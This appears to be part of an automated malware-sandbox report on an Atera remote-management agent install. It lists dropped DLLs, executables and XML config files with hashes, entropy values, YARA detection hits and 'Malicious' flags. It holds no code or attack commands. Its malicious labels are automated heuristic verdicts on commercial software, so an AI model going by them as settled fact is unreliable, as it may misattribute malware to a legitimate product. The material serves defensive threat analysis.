                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):79920
                                                                                                                                                                                                                                        Entropy (8bit):6.066087640666245
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:WN+DIHGXi30BmKGpqfwTwL5pxa/t4csUhtcyOH7Ov+lpMEpYinAMxClmWk:C+DIUmKK0wu5jcsU7cyOH7RF7HxdWk
                                                                                                                                                                                                                                        MD5:62BE08E35D6CEBE47FB5F8A3115318F2
                                                                                                                                                                                                                                        SHA1:F2A14834BC842EB5B3A0859BB95697B72C5C4BEF
                                                                                                                                                                                                                                        SHA-256:EDD644CDD12C3E8B66A4573D185E6F446D294E32EF205FC2802DC735FD1F70B9
                                                                                                                                                                                                                                        SHA-512:CB9FECF800157A3F8B59095AEF9759CE9C3BE1019D056BBD2FA821632545EDD6DC3F5B8D8E41B648C63F21FD2FEF936DB302D706AB537D02C2801722410B9CF6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):953
                                                                                                                                                                                                                                        Entropy (8bit):4.9874198404771155
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JduPF7NhOXrRH2/dVxlPH2/FVQ7uH2/F9y:327O7RgdjdgFSagFw
                                                                                                                                                                                                                                        MD5:8C9F9547ABA4CD154FAA858695986C4E
                                                                                                                                                                                                                                        SHA1:667630B8AEA31C20C20EE569983B73028F0DBA21
                                                                                                                                                                                                                                        SHA-256:7DE06E53089587194D3669B5F2050B363CC2AC1BC66F0537EC4D7AD94357D46F
                                                                                                                                                                                                                                        SHA-512:C305E923A197E2C39813D423FE50D94F183E932BCC66DBEE5667AD7F4083254D50510E35ED3603555FEB4C42F580C8A1FA3D1568CC7305D22B79AB406607F836
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):350256
                                                                                                                                                                                                                                        Entropy (8bit):2.897069871499034
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:erh1wSb/jb5FEH8VAynnnnnnnnnnnnnnn868m:454m
                                                                                                                                                                                                                                        MD5:E011CADB48B1465F8B1106526D1D56AC
                                                                                                                                                                                                                                        SHA1:201BA7076C90A134DEA1E20B4D0325E549928937
                                                                                                                                                                                                                                        SHA-256:015834AD82E58F2A7D4F804161D902A226AD0511285540F001F4D29974BD6B5D
                                                                                                                                                                                                                                        SHA-512:5FD577F31E243D8FD5294992F7E2B5EB1358102F254F787E7DDEB847C8623CC8D0E370F893AB3376A1B16D77AAEDFD42A02A218D6FAF025EA16904ABB44DAB59
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1547
                                                                                                                                                                                                                                        Entropy (8bit):5.008195800038022
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdsIOvPF7NhOXrRH2/dVxlPH2/FVQ7uH2/FVruH2/+mV0PH2/+w39y:3sIk7O7RgdjdgFSagFgg+msg+w3w
                                                                                                                                                                                                                                        MD5:029F543956E8B235A70112C77912150A
                                                                                                                                                                                                                                        SHA1:8F8916C78D9D3E5F92C37BDD39D34CD3B79BECA6
                                                                                                                                                                                                                                        SHA-256:33720B1985FE3F07F13744963085FA641F452EC393C3C8987A6023D0BC493BD1
                                                                                                                                                                                                                                        SHA-512:CF6EF25E7FD7E0B04A4F76B1552621874DAAA43838D0C028E62D1AABFFCD57AC7086A174BE9D5AF283DE8E8F09B5B40505478978102A1D8351681532B3828A38
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):350256
                                                                                                                                                                                                                                        Entropy (8bit):2.897069871499034
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:erh1wSb/jb5FEH8VAynnnnnnnnnnnnnnn868m:454m
                                                                                                                                                                                                                                        MD5:E011CADB48B1465F8B1106526D1D56AC
                                                                                                                                                                                                                                        SHA1:201BA7076C90A134DEA1E20B4D0325E549928937
                                                                                                                                                                                                                                        SHA-256:015834AD82E58F2A7D4F804161D902A226AD0511285540F001F4D29974BD6B5D
                                                                                                                                                                                                                                        SHA-512:5FD577F31E243D8FD5294992F7E2B5EB1358102F254F787E7DDEB847C8623CC8D0E370F893AB3376A1B16D77AAEDFD42A02A218D6FAF025EA16904ABB44DAB59
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1547
                                                                                                                                                                                                                                        Entropy (8bit):5.008195800038022
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdsIOvPF7NhOXrRH2/dVxlPH2/FVQ7uH2/FVruH2/+mV0PH2/+w39y:3sIk7O7RgdjdgFSagFgg+msg+w3w
                                                                                                                                                                                                                                        MD5:029F543956E8B235A70112C77912150A
                                                                                                                                                                                                                                        SHA1:8F8916C78D9D3E5F92C37BDD39D34CD3B79BECA6
                                                                                                                                                                                                                                        SHA-256:33720B1985FE3F07F13744963085FA641F452EC393C3C8987A6023D0BC493BD1
                                                                                                                                                                                                                                        SHA-512:CF6EF25E7FD7E0B04A4F76B1552621874DAAA43838D0C028E62D1AABFFCD57AC7086A174BE9D5AF283DE8E8F09B5B40505478978102A1D8351681532B3828A38
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):59952
                                                                                                                                                                                                                                        Entropy (8bit):6.133539293827828
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:T6O442hHI1kIHLxnuFjBm+UuLcxVePk+CXVT+rB9ezgEpYinAMxCHC:T6O4JuxnT+UuLMcBClyrvGp7HxV
                                                                                                                                                                                                                                        MD5:D306585C7E1A4489A09FBE260C90CC26
                                                                                                                                                                                                                                        SHA1:AD6B29943CDD31D630C1A9655F3F6E9D01F593F1
                                                                                                                                                                                                                                        SHA-256:464C50D4E60CD105899C3331733D69F4CBDA94792AF2550CC35BA48BF680B3BC
                                                                                                                                                                                                                                        SHA-512:0F1E29592FF5BCB5EDA0DE6D9DC4CE1CB9214556598AED146A172C42582A22F8DF1D9B3C53A74F6624275E4C733FF20493FDD9478C5E160E1C87B8DA2E7F5F79
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1191
                                                                                                                                                                                                                                        Entropy (8bit):4.971943087661362
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JduPF7NhOXrRH2/dVQ7uH2/FVxlPH2/FV0PH2/+w39y:327O7RgdSagFjdgFsg+w3w
                                                                                                                                                                                                                                        MD5:B8E88B1C181AFEB535BFEA1155000E8E
                                                                                                                                                                                                                                        SHA1:EB9066E96542DCE5F35DBF2F1424FD79ACEBB65F
                                                                                                                                                                                                                                        SHA-256:5D094CC46FED5173A2B1BE4C8E5DBDB658D2C14ABD367C47DFC6F6EABD5F295C
                                                                                                                                                                                                                                        SHA-512:58459651D3358FDDD4114AB569786A2306338C08D27D3D449BE2084EAE9D4A619C5650D3699DCA6702AEFDE8F9E77FD9E56C87EF51D4A8CCB2A22A378C488C37
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):23088
                                                                                                                                                                                                                                        Entropy (8bit):6.501386270939045
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:vLOGTOwM15TRwLm6orgNyb8E9VF6IYinAM+oCyyfq+M9:vnMTR0PaYEpYinAMxCo+M9
                                                                                                                                                                                                                                        MD5:1E88B244EED95A3FA6110F260C409FE1
                                                                                                                                                                                                                                        SHA1:7373FA85796B566DD3DDC667F494327BC6C890FB
                                                                                                                                                                                                                                        SHA-256:FC1E9D9BD607CC4B1B1D35CACCE1A1A0501EF35B29F9C7FF110F7F3CFC6CEAAB
                                                                                                                                                                                                                                        SHA-512:2F7A814BAF52F8BD6FB7A655326225CD0A5E737B8489AC5379CD7316F508F130F0396E03B6570F7E4C4389B088CB8EC371A3D9443C8A90232ED63C6CF91479A4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1817648
                                                                                                                                                                                                                                        Entropy (8bit):6.551348808770685
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:F9EeNSPwEW3cFSI4Tfm3hvbHsjAJcAMkP5:F9Nzm31PMo5
                                                                                                                                                                                                                                        MD5:D56ED44BF950BD2E5352B940E6700D37
                                                                                                                                                                                                                                        SHA1:C85A277E5F191778DB292F5A9411C6B8F0D51C81
                                                                                                                                                                                                                                        SHA-256:6C44D4A7E5FBE13ECD9379DAA1ECA36CA32FD9214F1E529350C818F26CD628D5
                                                                                                                                                                                                                                        SHA-512:AE43CCCE2439610B913D419B561568FF8C5C819917A02A693DE12CA42C60454BAF7232B48C9288C5D7BE94351EF01AECC10A71CC68FD9C725DF19AFA7EF9BBF3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1436208
                                                                                                                                                                                                                                        Entropy (8bit):6.7813779940444565
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:ts5ThI+vIjDEzn7tcBGtYnxLbdVlRdouD5RawYkGq78Yr4i9YE1tOvhefHXCvEs2:YlI+vIjE7mjOuKa8Riy+gvhaIn2+0V
                                                                                                                                                                                                                                        MD5:11609F2057A83EC8DB79C56BC69F6A0B
                                                                                                                                                                                                                                        SHA1:0F81FF1164F2F40346A2CA8DE70E3C3226111FB0
                                                                                                                                                                                                                                        SHA-256:178E80189D0B1667B0D58653F4378D784CFEA0B924FF56FEB3844FC8D80A78EF
                                                                                                                                                                                                                                        SHA-512:039949FDB44BC96C33F6EFB00917994322FE5597388C2C5ED46A3337D6E224BDDE534E70ABDF59C6B71A62B4158A64B8679294FAFE732514FAC1B3E57460D3D4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):583489
                                                                                                                                                                                                                                        Entropy (8bit):7.99944408666799
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:CLLJGMlifhYeKrN8qSQDqPVK04BwQjtVcUf7DmZMilOugjC6w:GwfhYeKraZQDqPY0E/4Uf7owugjm
                                                                                                                                                                                                                                        MD5:9614D1DA18956DE06747C03068208D66
                                                                                                                                                                                                                                        SHA1:FEA2680DDB9E4CEEA8489A132DF9A1542FEBFE88
                                                                                                                                                                                                                                        SHA-256:DDE9E0CA3FD274902F1A4C22CFEC6870C6C4DBBCCAD17D2189477AB60F769DAB
                                                                                                                                                                                                                                        SHA-512:D8E46A5819E9DCED61471966646DE153BF3480933054C50190D50DE4900685265367B12C9147630F184CE8809786FC010BF6FCD1884035FB4C77CFDE660A8B9D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):55344
                                                                                                                                                                                                                                        Entropy (8bit):5.801614737823664
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:R4DgbepEIgcvDiMd+R5B153ieGuftxw5dfiGoxkEpYinAMxCN4:Rr4EIgcxdQdGuftxw5dfiZd7Hxe4
                                                                                                                                                                                                                                        MD5:D11B2139D29E79D795054C3866898B7F
                                                                                                                                                                                                                                        SHA1:020581C77ED4BC01C3F3912F304A46C12CA443E6
                                                                                                                                                                                                                                        SHA-256:11CDB5EC172389F93F80D8EFF0B9E5D4A98CFEAB6F2C0E0BC301A6895A747566
                                                                                                                                                                                                                                        SHA-512:DE5DEF2EFCBA83A4B9301DD342391C306CF68D0BB64104839DFC329B343544FD40597A2B9867FD2A8739C63081D74157ACFC9B59C0CB4878B2F5155F582A6F09
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):535
                                                                                                                                                                                                                                        Entropy (8bit):5.076084597400077
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdG3VO3rdZRLNFF7ap+5v5OXrRf/2//FicYo4xm:JdfrdDPF7NhOXrRH2/d9r
                                                                                                                                                                                                                                        MD5:D505E3DE03F172FA2B246E210054C5F7
                                                                                                                                                                                                                                        SHA1:F5A480F56F760EEBA3B29108387E54D70A721127
                                                                                                                                                                                                                                        SHA-256:A568F933F09B1AD1EE5E88DDCFFA1FE5921D18B73477136E1FAEE55F2BEF399A
                                                                                                                                                                                                                                        SHA-512:80F01447B43525DBDF5B283522FE14D9AECEF16E55EA3FE36DC0A94B53C49E03BB56136F0911C348FB78FB5AF6112B1DE7C38CBFFBD73ACB2971655EF1B2B859
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>..
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.418295834054489
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhXSjn:WBa
                                                                                                                                                                                                                                        MD5:7E9C5492C1485A2AE94A108F6FFEEA95
                                                                                                                                                                                                                                        SHA1:F00A6A35F3D41AFF9ED2C028C26D918EEF06B715
                                                                                                                                                                                                                                        SHA-256:04CA73099B2058974220319A7CC3E156AE24AFA13B28F340E8D97B021D1BBC95
                                                                                                                                                                                                                                        SHA-512:191B4297645813DD163611547EC2708BD6678E535429FC4D771472BC185C887CAF24FAAA7F1DCF78577739E3D06387A756A11193C68918DDF47D21328CA1E4DC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=27.2
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):96816
                                                                                                                                                                                                                                        Entropy (8bit):6.179944898759355
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:XJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvC7Hxwm:XQUm2H5KTfOLgxFJjE50vksVUfPvCz
                                                                                                                                                                                                                                        MD5:9A344D6A16A6FEF791701FC52FA722A2
                                                                                                                                                                                                                                        SHA1:7F1CEF75650CA626D79F7F15818851A9C297F65E
                                                                                                                                                                                                                                        SHA-256:80890B7E8F3CC557A87BB1F84C7C30CA9B08B3F8AA68184D99439305EF91388E
                                                                                                                                                                                                                                        SHA-512:93ED10309A2EA138FE31BE55F82627290DDA0F8B7AEA63A54D97BB6EF2985BCC0449FCCC288DEF154D9F3318FB4DA9CAC3FBB4727986997DD1CDD5C97541139E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):186416
                                                                                                                                                                                                                                        Entropy (8bit):5.934478472448458
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:6kfZS7FUguxN+77b1W5GR69UgoCaf8/BCnfKlRUjW01KyFes:0+c7b1W4R6joxfQ8p
                                                                                                                                                                                                                                        MD5:A68241D6E026F218B259FD2CE8F744C0
                                                                                                                                                                                                                                        SHA1:DEA3F011BBC728DB750A054CCF3C5FDFE583EB91
                                                                                                                                                                                                                                        SHA-256:B0F5B75176B338F03AF4BB287259F36167D86C7A6EF128FE021B7401854F2362
                                                                                                                                                                                                                                        SHA-512:1CBFA69C0F75ADAC4C61A84A803201E1897B2A24E50570C44048C6DDAB57A03A1DEBEE04671A8F1FE83745ECD8A91447A4E4E10611811A8B136B3B2016EAD119
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):331824
                                                                                                                                                                                                                                        Entropy (8bit):6.168966743027853
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:KBhhiUWKJzPZNRntAXIjxs2f5Jg53XWlvidurmdIq8KmefViYkJTVBXi3VaKtNTe:KDMUWITZznu85k8Wdn8KmCjIFi3VvC
                                                                                                                                                                                                                                        MD5:DE6B588BD13AFFC760EE32D105C77A21
                                                                                                                                                                                                                                        SHA1:F9D20F683938F0347F0C2782D0E05FCFA143CEE1
                                                                                                                                                                                                                                        SHA-256:07762DCF4082B9A14BEC37573058015F03D26B46B9A6B7B0C0E66402CBE256F1
                                                                                                                                                                                                                                        SHA-512:6D0947E89ED1BF942C6BB93309BDD45B83FD92A3B8D0C4E3265A581DB9318B88187BDE5A58CFB5EE3A7BFE48167D4438B85D9FF03283C73A97B1C6022FE7CBCE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.9607419702126485
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:cBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUZ:cBjk38WuBcAbwoA/BkjSHXP36RMGw
                                                                                                                                                                                                                                        MD5:C2EBB296A9B097C4BC36018341C2F514
                                                                                                                                                                                                                                        SHA1:55B79CCD4F93AC6EF3AE6E2AD858DE5F23516EC9
                                                                                                                                                                                                                                        SHA-256:3CFB2C5E1947565F0795FCF5C0587B8F021842D52E79A40F25070BCABCE48089
